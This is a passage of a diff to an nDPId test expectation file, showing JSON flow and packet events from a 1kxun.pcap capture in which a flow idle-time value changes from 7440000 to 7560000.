{"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} +01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -251,26 +251,26 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104385827,"flow_last_seen":1470104385827,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104385827,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1470104385827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104385827,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1470104387260,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104387260,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFEAAAER7zPAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0wAAAERfDzAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfzUAAAERhGvAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"thread_ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="} 